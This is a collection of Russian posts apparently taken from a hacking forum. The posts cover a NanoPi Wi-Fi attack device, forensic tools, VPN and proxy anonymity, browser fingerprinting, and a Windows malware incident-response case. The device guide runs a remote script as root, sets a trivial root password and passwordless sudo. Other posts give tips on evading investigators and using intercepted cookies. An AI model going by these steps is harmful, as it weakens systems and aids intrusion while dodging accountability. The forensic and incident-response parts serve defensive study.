Разбирая в очередной раз груды непонятных скриптов, наткнулая на эту штуку. Этому проекто не менее трех лет. Прошу не судить меня строго, в то время я тоько начал постигать дзен линукса) Привел в порядок проект, все проверил, то, что провацировали конфликты, удалил, и наоборот, нужно поставил. Все работает отлично. Итак, что нам нужно, ну или по-крайней мере на каком устройстве данный скрипт будет работать 100% итак, поехали:

requirements.txt

1. FriendlyElec NanoPi2 with OLED Hat and metal box. Не самое современное устройство, в нем нет собственного приемника 80211...
2. ...так что я использую покупную, а а именно USB dongle Comfast CF-811AC.
3. Образ Armbian для одноименного устройства, с последней стабильной версией Debian. Сборка Server
4. Прямые руки Флешка, Ethernet провод и остальные прикладные мелочи.

После получение вышеперечисленных артефактов, записываем Armbian...iso на SD флешку (я использую balena.io/etcher), вставляем ее в устройство, подключаем проводом к домашней сети, находим устройство (лучше всего для этого подойдет Fing!, он есть магазине приложений для любого мобильного устройства), точнее его внутренний айпи адрес. Подключаемся к нему по ssh. Проходим стандартные процедуры ввода паролей и создания пользователя (любого). Вставляем вай-фай антенну в роутер.

install.sh

После попадания в саму систему, сразу же меняем root пароль на самый простой, так же меняем пароль пользователю. Редактируем файл /etc/sudoers (nano /etc/sudoers), приводим содержание трех строчек к такому виду:

root ALL=(ALL) NOPASSWD: ALL
x ALL=(ALL) NOPASSWD: ALL
%sudo ALL=(ALL) NOPASSWD: ALL

Соответственно х у меня - это Ваше имя пользователя, которое Вы только что создали у себя на устройстве. Далее заходим в стандартную для Armbian GUI оболочка командой armbian-config, в разделе System => CPU меняем диапазон значений работы ЦП от самого минимального, до максимума, мощность работы процессора так же выставляем на максимум. Выходим в шелл.

su root ; cd ~
git clone https://gitlab.com/x4k/pr /root/rrr ; cd /root/rrr ; bash install.sh

На этом Ваши действия заканчиваются, вы идете пить кофе, хакать пентагон и заниматься остальными своими делами. Через 30-50 минут Вы получите готовое устройство. Управрение устройством максимально удобное, после перезагрузки 22 порт станет недоступен, зато появиться веб-терминал по адрему http://ip_устройства:65000. Подключаемся, вводим имя пользователя и пароль (не рут). При первом входе в систему пишем следующее (чтобы автоматически перекидывало в root аккаунт): echo 'sudo zsh' >> ~/.bashrc ; echo 'sudo zsh' >> ~/.zshrc

How2

На этом все. Вся информация, нужная для удачного использования устройства находится перед вами. Выполняем любую из команд и следуем простым инструкциям. Интерфейс максимально дружелюбен. Чего и Вам желаю ;-)

В заключении прошу прощения если ошибся темой ;-) Спасибо)

Средства, применяемые экспертами при проведении экспертиз

ID: 676533bbb4103b69df371bf4
Thread ID: 52150
Created: 2021-05-25T16:51:58+0000
Last Post: 2021-05-26T18:12:49+0000
Author: baykal
Prefix: Статья
Replies: 10 Views: 3K

В данной статье мы расскажем о программных и аппаратных средствах, наиболее часто применяемых экспертами RTM Group при проведении компьютерных экспертиз.

В первую очередь нельзя не упомянуть простейший, и, в тоже время, главный инструмент для работы с файлами - Total Commander. Данный файловый менеджер ценится экспертами за его большой пакет интегрированных в одну универсальную практичную оболочку необходимых для исследования программ и плагинов, а также за гибкую и удобную систему настройки.

Обеспечение сохранности представленных объектов исследований в соответствии со статьей 16 Федерального закона от 31.05.2001 №73-ФЗ «О государственной судебно-экспертной деятельности в Российской Федерации» является одной из обязанностей эксперта. Поэтому эксперты применяют аппаратные и программные средства, с помощью которых имеется возможность проводить безопасное исследование представленных объектов, не изменяя целостности цифровых данных.

АППАРАТНЫЕ И ПРОГРАММНЫЕ СРЕДСТВА БЛОКИРОВКИ ЗАПИСИ

Аппаратные средства блокировки записи используются для безопасного подключения исследуемых носителей к ПК эксперта с целью недопущения искажения на них важной компьютерной информации. В распоряжении экспертов имеются: Tableau T35U – блокиратор записи фирмы «Tableau», AgeStar 3FBCP – адаптер фирмы «AgeStar», также имеющий в своем функционале защиту от записи. Данные приборы адаптированы для подключения к ним накопителей через интерфейсы IDE/SATA.
USB WriteProtect – утилита, которая позволяет на системном уровне защитить данные, записанные на подключенные через USB-порт устройства, а также предотвратить их изменение или удаление.

ПРОГРАММНЫЕ И АППАРАТНЫЕ СРЕДСТВА ВИРТУАЛИЗАЦИИ

Средства виртуализации используются экспертами для создания на операционной системе физического компьютера виртуальных машин с гостевыми операционными системами, таким образом получая виртуальную стендовую среду. Преимущества такого рода стенда заключаются в безопасном исследовании объектов, поступивших на экспертизу. В зависимости от объекта исследования эксперт использует соответствующее средство виртуализации: программный продукт виртуализации корпорации Oracle – VirtualBox , программное обеспечение виртуализации компании VMware - Workstation pro , а также встроенную в Windows систему аппаратной виртуализации компании Microsoft – Hyper-V.

Далее считаем важным отметить программные средства, так называемые швейцарские ножи мобильной и компьютерной криминалистики. Такое ПО обладает широким функционалом, таким как поиск, анализ, извлечение и восстановление данных, за что, собственно, и ценится экспертами.

ПРОГРАММНЫЕ СРЕДСТВА ПОИСКА, АНАЛИЗА
И ИЗВЛЕЧЕНИЯ ДАННЫХ

Мобильный криминалист – многофункциональный инструмент компании «Оксиджен Софтвер», позволяющий извлекать, расшифровывать и анализировать ключевые данные из мобильных устройств, персональных компьютеров, ноутбуков и облачных сервисов. Данный программный продукт обладает возможностями извлечения данных:

из мобильных устройств под управлением операционных систем iOS и Android;
из социальных сетей (Facebook, Twitter, Instagram, Вконтакте, Одноклассники);
из мессенджеров (Telegram, Line, Viber, WhatsApp);
из почтовых сервисов (Google Mail, Mail.ru, Яндекс.Почта);
о геолокации (AppleMaps, Google Location History, Uber, Яндекс.Такси);
о истории посещения браузеров (Google Chrome, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer) и др.

MOBILedit Forensic Express – программный продукт компании MOBILedit, использующийся экспертами для извлечения из мобильных устройств данных, таких как история звонков, контакты, текстовые и мультимедийные сообщения, фотографии, видеозаписи, элементы календаря, заметки, удалённые данные, а также пароли и данные из таких приложений как Skype, Dropbox, Evernote, Facebook, WhatsApp, Viber и другие.

Elcomsoft Premium Forensic Bundle – набор программных продуктов компании «Элкомсофт» для восстановления доступа к зашифрованным данным и подбора паролей к защищённым документам (Windows и macOS, macOS Keychain, ZIP/RAR/RAR5, PDF, BitLocker/PGP/TrueCrypt/VeraCrypt). Продукты для мобильной криминалистики позволяют извлекать и расшифровывать данные как из физических устройств (мобильных устройств и персональных компьютеров), так и локальных резервных копий и облачных сервисов (Apple, Google и Microsoft).

Belkasoft Evidence Center X – средство цифровой криминалистики, позволяющее извлекать данные из компьютеров (Windows, macOS, Unix), устройств хранения данных (жёсткие и SSD-диски, съёмные устройства), образов дисков (EnCase, AD1, AFF4, L01/Lx01, DD, SMART, X-Ways, Atola, DAR, DMG, архивы), виртуальных машин (VMware, Virtual PC/Hyper-V, VirtualBox, XenServer), памяти (образы RAM, файлы гибернации и подкачки), файловых систем (APFS, FAT, exFAT, NTFS, HFS, HFS+, ext2, ext3, ext4), мобильных устройств (iOS, Android, Windows Phone 8/8.1, Blackberry), облачных сервисов Google (Google Drive, Google Sync, Google Keep, GMail, Google Timeline, Google MyActivity), а также Apple (iCloud), сервисов мобильной почты (Yahoo, Hotmail, Opera, Yandex, Mac.com и пр.), Instagram, WhatsApp, Carbonite.

X-Ways Forensics – еще один инструмент, позволяющий решать широкий спектр задач компьютерной экспертизы и обладающий рядом таких функций, как съем и восстановление данных, просмотр и анализ данных, поиск и индексирование, хэширование.

Forensic Toolkit или FTK – инструмент компьютерной криминалистики компании «AccessData», имеющая мощную систему поиска данных по ключевым словам на исследуемых ЭВМ, мобильных устройствах и съёмных носителях для их дальнейшей обработки и анализа экспертом.

Autopsy – бесплатное программное обеспечение, которое используется для криминалистических исследований цифровых носителей и мобильных устройств. В состав этого ПО входит, в том числе анализ файлов, поиск по ключевым словам, восстановление удаленной информации и др.

ДИСТРИБУТИВЫ НА ОСНОВЕ LINUX

Kali Linux – специализированный дистрибутив Linux, основанный на Debian и применяемый для проведения тестирования на проникновение, аудита безопасности и компьютерной криминалистики.

CAINE Linux – бесплатный дистрибутив Linux, вобравший в себя известные инструменты цифровой криминалистики, в состав которых входят, например, описанный выше Autopsy, NirSoft, а также PhotoRec, поддерживающий восстановление файлов, и др.

Не всегда на практике эксперт использует программы - швейцарские ножи цифровой криминалистики, существуют случаи, когда «нож» и «открывашку» быстрее, удобнее и целесообразнее применять отдельно. При таких случаях эксперт прибегает к помощи набора различного рода утилит, например, NirSoft. Список данных инструментов довольно-таки внушительный, в нём имеются полезные утилиты для отображения информации из журнала событий Windows, извлечения информации из истории браузеров, файлов кэша и cookie, обнаружения и расшифровывания паролей и др.

ПРОГРАММНЫЕ И АППАРАТНЫЕ СРЕДСТВА
ПОИСКА И ВОССТАНОВЛЕНИЯ ДАННЫХ

PC-3000 – система компании «ACELab», которая предназначена для восстановления данных с исследуемых носителей и подразделяется на программно- аппаратные комплексы, применяющиеся в зависимости от типа носителя и поддерживаемого им интерфейса. Так при восстановлении данных с HDD- накопителей, RAID-массивов, flash-накопителей и SSD-накопителей в основном используется универсальный комплекс PC-3000 Portable III для восстановления данных на всех вышеперечисленных носителях.

Архивариус 3000 – программное обеспечение, предназначенное для поиска важных для исследования файлов по содержимому на ЭВМ и позволяющее мгновенно находить текстовые документы во всех популярных форматах после индексирования.

R-Studio – утилита для восстановления данных с исследуемых накопителей с различными файловыми системами. Функционал данного программного обеспечения позволяет анализировать данные на исследуемом носителе с целью нахождения информации о текущей и бывших файловых системах и восстановления файлов на её основе, а также производить поиск файлов по файловым сигнатурам в случаях, когда информация о файловых системах повреждена.

СПЕЦИАЛИЗИРОВАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ
ДЛЯ АНАЛИЗА ПРОГРАММНОГО КОДА

В число экспертных задач, помимо поиска, извлечения и восстановления информации, входит также анализ программного кода. Для её решения экспертами используются:

WinMerge – для сравнительного анализа текстовых файлов, в том числе исходных кодов.
Microsoft Visual Studio – среда разработки для анализа проектов, построенных по технологии .NET.
Net Beans IDE – среда разработки для анализа исходных кодов на Java.
Android SDK для исследования мобильных приложений на соответствующей платформе.

Так, гражданские по своей природе приложения стоят на "вооружении" у судебной экспертизы.

ИСТРУМЕНТЫ И АППАРАТНЫЕ СРЕДСТВА

При проведении экспертиз закупленной в рамках 44-ФЗ оргтехники используется измерительное оборудование, имеющее сертификаты поверки, такое как: «ТКА- ПКМ»(02) - прибор комбинированного типа, применяемый для измерения освещённости и яркости (Люксметр + Яркомер); цифровой мультиметр серии DT890B+.

В рамках радиотехнической экспертизы для определения причин выхода из строя технического устройства (заводской брак или вмешательство пользователя) используются оптические приборы (цифровой микроскоп МСП - 1 , увеличительные лупы и т.д.), специализированные инструменты (прецизионные отвертки, пинцеты, паяльная станция с термофеном LUKEY-702 , лабораторный источник питания ELEMENT 1502D+ , осциллограф цифровой UNI-T UTD2072CEX- II).

ПРОГРАММНО-АППАРАТНЫЕ СРЕДСТВА
ФОНОСКОПИЧЕСКИХ ИССЛЕДОВАНИЙ

Помимо компьютерно-технического направления экспертами проводятся исследования аудиозаписей голоса, звучащей речи и звуковой среды. В связи с этим считаем необходимым упомянуть программно-аппаратные средства, применяющиеся при таком роде экспертиз.

ИКАР Лаб I+ - программно-аппаратный комплекс группы компаний ЦРТ, использующийся для решения широкого спектра задач анализа звуковой информации. В состав данного комплекса входят: устройство ввода-вывода звуковых сигналов STC-H453 , комплект для преобразования речи в текст Цезарь-Р , программное обеспечение для визуализации и анализа исследуемых звуковых сигналов SIS II , программное обеспечение для шумоочистки Sound Cleaner II.

Audacity – кроссплатформенное программное обеспечение, ориентированное на редактирование звуковой информации. В экспертной практике используется для анализа спектрограммы и дальнейшей идентификации звуков и речи.

По материалам статьи RTM Group, rtmtech.ru

Насчет форумов и ментов

ID: 676533bbb4103b69df371c98
Thread ID: 41801
Created: 2020-09-05T18:01:51+0000
Last Post: 2020-09-28T16:46:37+0000
Author: negg
Replies: 27 Views: 3K

Обьясните +-,как понять форум ментовский ли, нужен хороший анализ на протяжении немалого времени? Или же хороший osint. И за что накрывают людей на форумах? Могут просто обычного юзера ни за что закрыть? Непонятно просто,много выссказываний,тема интересна. Чисто интерес

VPN и SOCKS что и где лучше покупать?

ID: 676533bbb4103b69df371c11
Thread ID: 49546
Created: 2021-03-18T19:53:02+0000
Last Post: 2021-04-05T09:20:37+0000
Author: xmenusa
Replies: 21 Views: 3K

Знаю, тема не нова для многих.
Интересен вопрос, на рынке очень много условно-бесплатных (с ограничениями) VPN, есть не дорогие VPN каждый себя трактует как анонимный.

Вот тут встал вопрос, где лучше купить VPN и SOCKS что бы быть уверенным что логи он не ведет и не палит мою деятельность в сети, вообще такое сужествует.

Поделитесь опытом кто какой сервис юзает, и что почем???

Остается ли след после взлома сайта?

ID: 676533bbb4103b69df371c13
Thread ID: 49427
Created: 2021-03-16T17:42:47+0000
Last Post: 2021-04-02T20:09:20+0000
Author: senegal55
Replies: 27 Views: 3K

Пожалуйста без своих тупых комментариев и выебонов типа как такое можно не знать и все в этом духе, вы тоже этого когда-то не знали. Какой нибудь след остается на серверах после взлома сайта , нужно ли юзать впн или прокси. Спасибо

Уникальный хэш браузера || Что о вас знают перед установкой

ID: 676533bbb4103b69df371c17
Thread ID: 44829
Created: 2020-11-26T09:13:39+0000
Last Post: 2021-03-28T00:08:45+0000
Author: Xk-ar
Prefix: Статья
Replies: 9 Views: 3K

Суть этой статьи такова: Мы имеем популярные браузеры на базе хромиума и если мы скачаем их разным способом мы увидим некую законамерность

Законамерность заключается в уникальности хэша, при каждой скачки с официального ресурса на примере Хрома и Оперы

Чтобы это провернуть я накатил чистую виртуалку 10 винды
В ней есть Edge, заходим и с помощью поискового сервиса гугл ищим, после скачиваем: Chrome, Opera, Firefox (Чтоб не нарушать эксперемент делайте это из под одного поисковика)

Скачали? Хорошо, теперь положите эти 3 установщика в 1 папку
Повторяем еще раз и кладем следующие 3 файла в 2 папку
Теперь заходите в инкогнито и повторяйте цикл действий
(Я думаю вы не скачивали с одной ссылки по 3 раза, а скачивали после закрытия поисковой вкладки)

У нас теперь есть 3 папки в каждой по 3 файла
Молодцы, я забыл добавить что нам нужен HashTab, устанавливайте

Начинаем сверять хэши:

Chrome1,2,incog.png
Вот это Chrome, каждый файл с уникальным хэшем. Не забываем что это просто установщик который вы могли закинуть на флешку и допустим ставить его на машины с которых ведёте цифровую деятельность.
Opera1,2,incog.png
Та же песня, продолжаем.

Firefox1,2,incog.png
Вот огненная лисичка которая сейчас живёт на дотации от гугла, можете почитать их доходы.
(Почти все деньги на поддержку проекта идут от гугла, лишь бы поисковик остался)

Теперь разбираемся из за чего у нас каждый установщик имеет уникальный хэш
На скрине видно gclid это Google client id и его порядковый номер
Сохраним этот текст и вставим в другой вкладке скачивания хрома

Скачали оба файла? Если да то проверяем хэш

Сходится..

Вывод: Не стоит скачивать 1 раз и использовать много раз в разных случаях, сервера могут хранить ваши подключения при установки
Ну а дальше сами мыслите как это могут использовать такие гиганты как гугл.

Анонимные прокси

ID: 676533bbb4103b69df371e14
Thread ID: 5696
Created: 2005-11-23T23:08:54+0000
Last Post: 2005-11-30T16:27:26+0000
Author: LaN_DAo
Replies: 5 Views: 3K

Кто какими толковыми программами пользуется для поиска(гугль рулит ет понятно) прокси листов и их проверки. И как толково настроить к примеру выход в нет через цепочку проксей
real IP -> proxy -> proxy -> proxy -> host
Спасиб.

Настраиваем браузер для анонимного серфинга на базе Firefox ч.2

ID: 676533bbb4103b69df371c22
Thread ID: 48922
Created: 2021-03-04T10:35:17+0000
Last Post: 2021-03-12T20:27:35+0000
Author: hw18
Prefix: Статья
Replies: 9 Views: 3K

**Дисклеймер : Я не претендую на звание профессиАнала и прочих рЫгалий в сфере безопасности и т.д. и т.п.. Все что я пишу в той и предыдущей статье (см. **_

http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/43944/

_**) я просто делюсь своим опытом не более. Тем кто сможет дополнить материал буду очень признателен, комьюнити тут огромное и много ребят с опытом на них вся надежда. Да я видел всякие копипасты на разных форумах с использованием гугл переводов на разных форумах включая этот но "ты не понимаешь это другое"

Лирический отступ: **Ну короче, спустя довольно продолжительное время я созрел продолжить статью на которое все время мне нехватало времени. По скольку я его нещадно тратил его на жен(чужих конечно), любовниц, погоню за деньгами и прочее. Вот я тут, и сейчас мы стартуем!

В прошлой статье я описывал какие манипуляции нужно произвести над своим браузером что бы он выдавал как можно меньше информации о вас. Сегодня я расскажу что установить что бы сервер выдал как можно болье информации о себе и им легко можно было манипулировать. В этой части я буду описывать какие дополнения следовало бы добавить в браузер начинающему а может и опытные найдут то чего не знали ( но
))

И так начнем:

Первое на что стоит обратить ваше внимание так это на старый добрый TrackMeNot
TrackMeNot работает как фоновый процесс с низким приоритетом, который периодически запускает рандомизированные поисковые запросы к популярным поисковым системам, например, Yahoo, Google и Bing. Он скрывает реальные следы поиска пользователей в облаке «призраков». запросов, что значительно увеличивает сложность объединения таких данных в точные или идентифицирующие профили пользователей. Cоответственно будет намного сложнее отследить ваши реальные запросы у поисковых ситем но это не значит что установив дополнение можно сразу гуглить "проститутки, соли, макаров купить"

Следуйщее по списку что стоит использовать так это [UserAgent Switcher and Manager](https://addons.mozilla.org/ru/firefox/addon/user-agent-string- switcher/) утилита проста в использовании но очень мощная. Собственно что она делает: она подменяет юзер агент вашего браузера на заранее выбранный (внутри масса браузеров и версий) это очень удобно для разведки вашей цели. Если расследование будет производить сама компания, скорее всего она не может найтии идефицировать вас если вы конечно же используете VPN и чистите за собой логи.

Далее конечно же [FoxyProxy](https://addons.mozilla.org/ru/firefox/addon/foxyproxy- standard/) незаменимая вещь при использовании BurpSuite или просто каких либо проксей. Существенно облегчает работу с проксями и позволяет быстро переключаться между ними. Интерфейс максимально примитивный и с ним разберется любой пятикласник.

[Cookie Quick Manager](https://addons.mozilla.org/ru/firefox/addon/cookie- quick-manager/) еще один менеджер но теперь по управлению куками позволяет быстро редакироваьть ваши куки с каждой открытой вкладкой если вам удасться перехватить или подобрать куки это дополнение будет незаменимо для вас.

Еще один незаменимый помощник который вам понадобиться это Сoockie Auto Delete софтина подичщает за вами сесси что позволяет не допустить оплошостей, и защитит от компрометации ваших данных.

Ну и наверное последнее дополнение которое использовать НА СВОЙ СТРАХ И РИСК это Wappalyzer Почему у меня к нему такое недоверие? Так это отсутсвие понимания как оно работает и может ли оно вас выдать, но стоит отдать должное что определяет приложения очень точно что глобально экономит время на разведке.

З.Ы. Ну вобщем то и все. Рассказал что знаю к списку можно еще добавить адблоки по типу Ghostery и PrivacyBudger но я думаю вы и без меня разберетесь. Всем удачи надеюсь помог кому-нибудь в дальнейшем думаю написать еще немного статей но потом)

Почему поисковик duckduckgo считается анонимным?

ID: 676533bbb4103b69df371c28
Thread ID: 46521
Created: 2021-01-09T19:50:31+0000
Last Post: 2021-03-04T09:58:42+0000
Author: tipokipocod
Replies: 20 Views: 3K

Почему браузер duckduckgo считается анонимным? С чего это?Какие гарантии?
Раньше еще была какаято надпись "в партнерстве с яндекс" что это?

Украли 30к$ - 202 монеты Monero с mymonero.com

ID: 676533bbb4103b69df371c34
Thread ID: 47760
Created: 2021-02-07T20:38:19+0000
Last Post: 2021-02-22T17:34:36+0000
Author: Sebastian
Replies: 19 Views: 3K

Всем привет. Сегодня у меня украли 202 монеты c кошелька mymonero.com
Ключ я хранил в файле на MacOS, каждый раз при заходе в кошелек использовал VPN и TOR браузер копировал ключ и вставлял на сайте для входа.
Деньги уже не вернуть. Но очень хочется узнать как это провернули. Напишите свои идеи и как это можно проверить.
В фоновом режиме работает Хром и в нем есть несколько расширений - у меня есть догадки что они имеют доступ к буферу обмена.
Буду благодарен за помощь специалистов или знатоков как это могло произойти.
Кошелек юзал несколько месяцев и нового софта не ставил.
Фишинг исключен.
Если у меня в буфере обмена есть ключ и я захожу на левый сайт, может ли он получить доступ к моему буферу обмена и заполучить из него инфу.
Спасибо)

VPN над Tor

ID: 676533bbb4103b69df371c6a
Thread ID: 45458
Created: 2020-12-12T15:09:49+0000
Last Post: 2020-12-14T22:28:17+0000
Author: user259
Replies: 20 Views: 3K

Здравствуйте! Как можно пустить трафик через тор, а после через впн не прибегая к использованию виртуальных машин? Использую линукс. Если подключить тор и впн одновременно, то трафик идет сначала через впн, а потом через тор, в следствии чего некоторые сайты отклоняют запрос из за тора.

Реагирование на компьютерные инциденты в ОС семейства Windows. Методика и реальный пример.

ID: 676533bbb4103b69df371c7e
Thread ID: 43755
Created: 2020-10-31T12:41:04+0000
Last Post: 2020-11-12T08:30:24+0000
Author: Temchi
Prefix: Статья
Replies: 10 Views: 3K

Вступление

Всех приветствую! Говоря простым языком, компьютерный инцидент – это последствия после проведенной компьютерной атаки. (Далее вместо термина «компьютерный инцидент» будем кратко говорить – «КИ») В настоящее время реагирование на КИ занимает одну из ключевых областей компьютерной безопасности, а специалистов, которые занимаются их расследованием красиво называют «компьютерными криминалистами» или SOC аналитиками.

На данный момент в странах СНГ и в частности России, тематика реагирования на КИ развита очень слаба. Частично это связано с тем, что количество русскоязычных материалов по данной тематике очень мало. В этом плане запад ушел далеко вперед, но мы потихоньку их догоняем.

Сегодня в сети отсутствуют простые и практичные методики реагирования на КИ никак не связанные с юридической частью. Поэтому цель данной статьи – описать простую методику реагирования на КИ, которую можно применять в небольших корпоративных сетях и привести несложный пример из реальной жизни для повышения уровня понимания этой тематики.

Дисклеймер : если эта статья будет интересна и понравится читателям, то я планирую написать цикл статей по данной тематике, где мы подробно разберем различные инциденты не только в ОС семейства Windows, но и Linux-подобных, Android и IOS системах. Будут разобраны различные утилиты, методики атакующих по сокрытию своих следов и сама логика процесса реагирования. В каждой статье будут приводиться только реальные примеры из жизни.

Методика реагирования

Сразу предупрежу, что разбора используемых утилит на каждом этапе не будет, чтобы не раздувать статью. Пример реагирования будет выбран достаточно простой, в том числе для того, чтобы для разбора хватило основных утилит, которые все и так знают.

Для успешного реагирования на КИ в данной методике необходимо реализовать 6 этапов:

1. Обнаружение
На этапе обнаружения необходимо определить является ли возникшее ИБ событие КИ или нет.

2. Изоляция
На этапе изоляции необходимо произвести изоляцию скомпрометированных компьютеров от внешней среды.

3. Сбор данных
На этапе сбора данных производится фиксация состояния всех скомпрометированных компьютеров.

4. Изучение
На этапе изучения по полученным данным скомпрометированных компьютеров производится криминалистический анализ для получения подробной информации об инциденте.

5. Ликвидация
На этапе ликвидации по полученной информации производится удаление ВПО и восстановление штатного режима информационной системы.

6. Выводы
На этапе выводов производится перенастройка и конфигурация информационной системы для предотвращения возникновения похожих КИ в будущем.

Далее обсудим эти этапы подробнее.

Этап «Обнаружение»

Инциденты могут быть обнаружены ответственными на объекте за реагирование на КИ сотрудниками, через различные автоматизированные средства обнаружения, такие как: IDS, IPS, антивирусное программное обеспечение, SIEM-системы и прочее.

Также, инциденты могут быть обнаружены ручными средствами, такими как сообщения пользователей о проблемах.

«Компьютерные криминалисты» не занимаются обнаружением инцидентов. Для этого существует отдел мониторинга, который собирает, анализирует информацию с сенсоров установленных на объектах и передает её следующим специалистам.

Этап «Изоляция»

Необходимо определить зараженные компьютеры по общим признакам, например, если известен IP или URL адрес центра управления, то поместить их в отдельный сегмент корпоративной сети и настроить правила безопасности таким образом, чтобы распространение не продолжалось дальше.

При этом запрещено физически отключать компьютер от локальной сети, т.к. ВПО может начать удаление себя и своих следов при отсутствии сетевого соединения.

Так же недопустимо отключать питание компьютера, т.к. некоторые угрозы не создают файлов на диске, а полностью размещают себя в оперативной памяти, так как там их сложнее обнаружить. Поэтому, при отключении питания будет утрачена вся информация, содержащаяся в оперативной памяти.

Конфигурации межсетевого экрана, маршрутизатора или прокси сервера в корпоративной сети должны быть изменены таким образом, чтобы остановить сетевой трафик, который является частью инцидента.

Этап «Сбор данных»

Необходимо снять образ жесткого диска и образ оперативной памяти скомпрометированных компьютеров. При этом образ оперативной памяти имеет больший приоритет, поэтому нужно начинать с него.

Снятие образов позволяет получить все компоненты ВПО. По результатам исследования этих компонентов можно определить, как следует бороться с заражением. Также анализ образов позволит определить вектор распространения угрозы, чтобы не допустить повторного заражения по аналогичному сценарию.

Этап «Изучение»

На данном этапе в первую очередь используя автоматические и ручные инструменты с помощью которых производится поиск ВПО и индикаторов компрометации. Необходимо проверить на подозреваемых компьютерах следующие основные ИБ события:

Наличие неизвестного ПО в автозагрузке
Наличие неизвестного сервиса
Неполадки в работе антивируса
Наличие подозрительных процессов
Нестандартное расположение некоторых исполняемых файлов
Нестандартное расположение некоторых DLL библиотек
Наличие инструментов удаленного администрирования
Наличие инструментов для извлечения паролей
Непредвиденное повышение привилегий пользователя

После обнаружения ВПО, необходимо проанализировать его функционал для того, чтобы понять какой ущерб мог быть нанесен. Для этого могут использоваться различные средства для анализа PE-файлов. Автоматизированные средства, такие как песочницы. Утилиты сигнатурного анализа и диазссемблеры.

Этап «Ликвидация»

На этапе ликвидации производятся активные действия по удалению угрозы из сети: удаляется ВПО, изменяются взломанные учетные записи (их можно временно заблокировать, сменить пароль или, например, переименовать), устанавливаются обновления и патчи для проэксплуатированных уязвимостей. Указанные действия выполняются для всех затронутых инцидентом сущностей — и для устройств, и для учетных записей, и для программ.

Этап «Выводы»

На этапе выводы анализируются причины инцидента для того, чтобы свести к минимуму вероятность повторного аналогичного инцидента в будущем. Принимаются все меры по предотвращению повторных атак. Такие как:

Изменение настроек средств защиты информации
Изменение архитектуры информационной системы
Внедрение новых средств защиты информации
Обновление уязвимого и устаревшего ПО
Консультирование рабочего персонала

Пример реагирования на КИ

Для того, чтобы не раздувать разбор примера, архитектура сети была сильно упрощена, а также пропущены некоторые шаги методики и самого расследования. Инцидент произошел в 2015 году.

Исходные данные :

Имеется компьютер под управлением ОС « Windows 7 x64 »
Известен факт того, что на нем произошел КИ типа « Заражение ВПО », но ip-адрес центра управления неизвестен.
Данный компьютер находится в общей локальной сети с двумя другими компьютерами
У компьютеров в локальной сети имеется выход в сеть Интернет
Весь трафик проходит через внешнюю машину с установленной « IDS Snort »

Этап «Обнаружение»

Этот этап пропускаем, т.к. по условию известен факт возникновения КИ.

Этап «Изоляция»

Тут возможно два варианта. Перенастроить Snort таким образом, чтобы дропать весь трафик в режиме IPS, либо полениться и на трех рабочих компьютерах настроить правила брандмауэра Windows таким образом, чтобы у всех приложений отключить входящие и исходящие соединения. Делается это в пару кликов.

Этап «Сбор данных»

Для получения образа оперативной памяти и жесткого диска я как правило пользуюсь утилитой “ FTK Imager”, которая установлена у меня на рабочей флешке . Опустим этот этап. В интернете полно мануалов как нажать пару кнопок в гуи для снятия дампов с помощью этой утилиты.

Этап «Изучение»

Самый сложный и трудоемкий этап. Может занимать очень продолжительное время. Зависит не только от сложности ВПО, но и архитектуры сети компании, а также на сколько руководство пострадавшей компании готовы идти на контакт… Часто бывают случаи сокрытия фактов инцидента и звонить не начнут, пока не потеряют кучу денег.

В первую очередь необходимо выгрузить из образа жесткого диска конфигурационные файлы, в которых хранится реестр Windows. Для этого воспользуемся набором утилит для криминалистического анализа « The Sleuth Kit ».

С помощью утилиты « mmls » получим информацию о имеющихся разделах:

На скриншоте видно, что имеется два NTFS раздела. По столбцу Length видно, что размер второго раздела во много раз превышает размер первого. Это говорит о том, что система скорее всего установлена на втором разделе, а первый раздел зарезервирован операционной системой. Нас интересует базовый адрес основного раздела, который указан в столбце Start.

Далее выгрузим основные, необходимые файлы, в которых хранится реестр Windows, а именно: NTUSER.DAT, SYSTEM, SOFTWARE. Это не все файлы реестра, поэтому при необходимости остальные выгружаются аналогично. Для этого с помощью утилиты «fls» узнаем их соответствующий номер записи в главной файловой таблице MFT:

С помощью утилиты «icat» скопируем необходимые нам файлы:

Для анализа файлов реестра воспользуемся утилитой «RegRipper v.2.8». Начнем с раздела «SOFTWARE»:

Узнаем точную версию ОС скомпрометированного компьютера. Для этого рассмотрим куст реестра « Microsoft\Windows NT\CurrentVersion »:

Видим, что исследуемый компьютер работает под управлением ОС Windows 7 Ultimate с пакетом обновления SP1.
Далее поработаем с файлом «NTUSER.DAT»:

В первую очередь просмотрим последние записи в основном разделе отвечающую за автозагрузку « Software\Microsoft\Windows\CurrentVersion\Run» на наличие подозрительных приложений. Особое внимание привлекают последние две записи:

Эти записи являются подозрительными и имеют очень нестандартное расположение « C:\Users\PC\AppData\Roaming ». Так же заметим, что в той же директории находится dll библиотека. Судя по синтаксису, « rund1132.exe » это системная утилита Windows которая импортирует функцию « Enter » из библиотеки « comctl32.dll ». (Отличие в названии. Буква “l” заменена на “единицу”)

Утилита « rundll32.exe » предоставляет контейнер для выполнения DLL и имеет следующий синтаксис:

Также стоит отметить, что библиотека « comctl32.dll » является системной и поэтому находиться в данной директории не может.
Посмотрим запускался ли он. Для этого воспользуемся файлом реестра « SYSTEM »:

Рассмотрим куст реестра «ControlSet001\Control\Session Manager\AppCompatCache»:

Имеем некоторую отправную точку: знаем, что он запускался и как следствие имеем некоторую дату в малой окрестности которой произошел КИ.
Далее проведем анализ временных меток. Для этого с помощью утилит « fls » и « mactime » из пакета «The Sleuth Kit» построим таймлайн по временным меткам:

Теперь проанализируем полученный файл « timeline.csv » с помощью утилиты « Timeline Explorer ».
Т.к. запуск ВПО был произведен 27.05.2015 в 07:31:05 то посмотрим, что происходило в окрестности этого времени в системе:

В эту же секунду до создания вредоносных файлов, в кэше браузера появляются временные word документы.
Выгрузим один из экземпляров. Для удобства переименуем временный файл на « suspicious_word.tmp » и проанализируем его с помощью утилиты « OfficeMalScanner »:

После анализа по известным сигнатурам, утилита установила временному файлу « suspicious_word.tmp » индекс вредоносности равный 20. Это говорит о том, что в документе имеется вредоносный исполняемый shell-код.
Узнаем подробнее какой эксплойт использовался для выполнения исполняемого shell-кода в word документе. Для этого воспользуемся утилитой « Yara-scanner ». На гитхабе был найден репозиторий с готовым Yara-правилом для анализа вредоносных документов « quicksand_exploits ». Воспользуемся им:

